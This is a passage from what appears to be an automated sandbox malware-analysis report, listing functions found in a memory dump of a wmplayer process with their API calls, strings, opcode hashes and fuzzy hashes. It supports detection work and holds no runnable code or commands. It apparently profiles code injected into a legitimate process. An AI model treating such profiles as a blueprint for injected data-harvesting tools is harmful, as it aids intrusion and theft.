                                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                            Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                            • String ID:
                                                                                            • API String ID: 4218492932-0
                                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                            Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: gj
                                                                                            • API String ID: 438689982-4203073231
                                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                            Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                            • memset.MSVCRT ref: 00405ABB
                                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4281309102-0
                                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                            Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscat
                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                            • API String ID: 384018552-4153097237
                                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                            Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 2029023288-3849865405
                                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                            Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                            • memset.MSVCRT ref: 00405455
                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                            • memset.MSVCRT ref: 00405483
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                            • String ID: 6$\
                                                                                            • API String ID: 404372293-1284684873
                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                            Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1331804452-0
                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                            Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: advapi32.dll
                                                                                            • API String ID: 2012295524-4050573280
                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                            Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • <%s>, xrefs: 004100A6
                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                            • API String ID: 3473751417-2880344631
                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                            Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2521778956-791839006
                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                            Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscpy
                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                            • API String ID: 999028693-502967061
                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                            Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 4131475296-0
                                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                            Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2618321458-3614832568
                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                            Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFilefreememset
                                                                                            • String ID:
                                                                                            • API String ID: 2507021081-0
                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                            Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                            • free.MSVCRT ref: 00417544
                                                                                            • free.MSVCRT ref: 00417562
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4131324427-0
                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                            Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                            • free.MSVCRT ref: 0041822B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$free
                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                            • API String ID: 924794160-1420421710
                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                            Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0041477F
                                                                                            • wcscpy.MSVCRT ref: 0041479A
                                                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                                                            • String ID: General
                                                                                            • API String ID: 999786162-26480598
                                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                            Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                            • String ID: Error$Error %d: %s
                                                                                            • API String ID: 313946961-1552265934
                                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                            Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                                            • API String ID: 0-1953309616
                                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
